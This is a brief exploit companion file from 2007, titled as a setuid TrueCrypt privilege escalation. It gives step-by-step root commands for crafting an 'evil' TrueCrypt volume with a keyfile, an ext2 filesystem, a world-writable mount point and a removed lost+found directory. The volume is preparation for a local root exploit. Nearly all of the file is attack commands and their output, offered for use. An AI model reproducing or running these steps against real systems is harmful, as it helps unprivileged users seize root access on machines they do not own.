$Id: pwned.txt,v 1.1.1.1 2007/04/04 11:31:56 raptor Exp $

raptor_truecrypt - setuid truecrypt privilege escalation
Copyright (c) 2007 Marco Ivaldi <raptor@0xdeadbeef.info>

How to create your own evil truecrypt volume:

# id
uid=0(root) gid=0(root) groups=0(root)
# echo whatever > pwned.key
# truecrypt --type normal --filesystem none --size 256000 --encryption AES \
  --hash SHA-1 --keyfile pwned.key --create pwned.tc
Enter password for new volume 'pwned.tc': 
Re-enter password: 

TrueCrypt will now collect random data.

[...]

Done: 0.00 MB  Speed: 0.00 MB/s  Left: 0:02:47  
Volume created.
# truecrypt --keyfile pwned.key pwned.tc
Enter password for '/root/test/pwned.tc': 
# mke2fs /dev/mapper/truecrypt0

[...]

# mount /dev/mapper/truecrypt0 /mnt
# cd /mnt
# chmod 777 .
# rm -fr lost+found
# truecrypt -d /mnt
